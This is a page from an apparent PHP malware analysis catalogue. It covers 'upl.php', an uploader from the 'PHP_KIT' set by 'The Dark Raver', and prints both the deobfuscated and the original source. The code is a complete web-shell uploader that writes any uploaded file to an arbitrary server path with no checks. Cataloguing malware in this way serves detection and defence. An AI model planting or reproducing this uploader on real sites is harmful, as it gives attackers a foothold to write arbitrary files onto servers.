PHP Malware Analysis

Back to list

Filename: upl.php

Tags

Input
  • _POST
  • HTTP_POST_FILES
Files
  • copy

Deobfuscated code

<?php

//// PHP_KIT//// up.php = File Upload//// by: The Dark Raver// modified: 21/01/2004//
?> <html><body> <form enctype="multipart/form-data" action="" method="post"><input type="hidden" name="MAX_FILE_SIZE" value="1000000"><p>Local File: <input name="userfile" type="file"><p>Remote File: <input name="remotefile" type="text"><input type="submit" value="Send"></form><br><br><br> <?php 
if (is_uploaded_file($HTTP_POST_FILES['userfile']['tmp_name'])) {
    copy($HTTP_POST_FILES['userfile']['tmp_name'], $_POST['remotefile']);
    echo "Uploaded file: " . $HTTP_POST_FILES['userfile']['name'];
} else {
    echo "No File Uploaded";
}
?> </html></body>


Original code

<?//// PHP_KIT//// up.php = File Upload//// by: The Dark Raver// modified: 21/01/2004//?> <html><body> <form enctype="multipart/form-data" action="" method="post"><input type="hidden" name="MAX_FILE_SIZE" value="1000000"><p>Local File: <input name="userfile" type="file"><p>Remote File: <input name="remotefile" type="text"><input type="submit" value="Send"></form><br><br><br> <? if(is_uploaded_file($HTTP_POST_FILES['userfile']['tmp_name'])) { copy($HTTP_POST_FILES['userfile']['tmp_name'], $_POST['remotefile']); echo "Uploaded file: " . $HTTP_POST_FILES['userfile']['name'];} else { echo "No File Uploaded";} ?> </html></body>